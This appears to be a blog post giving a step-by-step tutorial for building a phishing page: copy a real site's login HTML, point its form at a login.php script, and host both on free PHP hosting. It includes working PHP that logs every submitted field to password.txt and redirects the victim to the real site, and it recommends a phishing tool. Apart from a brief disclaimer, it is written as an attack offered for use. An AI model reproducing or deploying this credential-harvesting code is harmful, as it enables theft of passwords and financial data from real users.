Phishing(using Fake login page)

"Phishing" is an example of social engineering some what equivalent to "Fishing" lol ,in fishing fishes are fooled and trapped in net,same way in "Phishing" the user is fooled by sending fake login pages eventually the user fall in the trap of the hacker and end up giving away important data like credit card no ,email password,info on online money transaction... etc.Nowadays this method of hacking is very common because of its 70-80% success rate.It lags by 30-20% because its success entirely depends on the user to do the mistake and login to the intended fake page.Even when using server authentication ,it may require tremendous skill to detect that the website is fake.As mentioned above the relationship between fishing and phishing but it is somewhat variant whereas it is influenced by "Phreaking.
Now I am going to describe the complete procedure carried out to do this attack,before doing that i would like to mention that this is very useful in "Social Networking".This is an effort to make the user aware of this kind of threat when they are working online and stay safe rather trying it on others.(Disclaimer)

1.Inorder to carry out we need three things Fake.html,login.php,Password.txt

2.To make the Fake.html right click on the original page and left click on the view source and copy it (ctrl + c) then paste it in a text file or notepad and save it as .html extension.

3.Now open the Fake.html in wordpad or notepad and search (ctrl +f) for "action=",edit the original value and assign login.php ie. action="login.php" and method="GET".

4.As we are made with the Fake.html now we will go for login.php,in order to make it we need the code given below.(DOWNLOAD)




<br /> <?php header ('Location: http://www.original-site.com '); $handle = fopen("password.txt", "a"); foreach($_POST as $variable => $value) {<br /> fwrite($handle, $variable);<br /> fwrite($handle, "=");<br /> fwrite($handle, $value);<br /> fwrite($handle, "\r\n");<br /> }<br /> fwrite($handle, "===============\r\n");<br /> fclose($handle);<br /> exit;<br /> ?><br />

Note:header ('Location: http://www.original-site.com ') in the above code,the victim will be redirected to the site as mention in this so,the original site is to be assigned.

5.Now open up a account in a free web hosting with PHP enabled and having file transfer protocol(ftp) for example:www.t35.com

6.Now upload the above two file ie.Fake.html login.php to the web account and then the hacker sends the link which looks like http://www.your-accnt.t35.com/fake.html

7.When the victim login to that link then the username and password gets store in a file as mentioned in step:1 which is automatically created in the web account then it can be opened to see the password.

As the above mentioned method requires a lot of editing and code writing so a free tool called Super Phisher v1.0 comes very handy in carrying out all the work performed in step 2,3,4.It is freeware ,so it is available through any search engine.

Declaration:The author will not be held responsible for any illegal use of this article.This is only to aware the users the threats they are exposed to.

If you find this post useful and informative do post your comment and share it.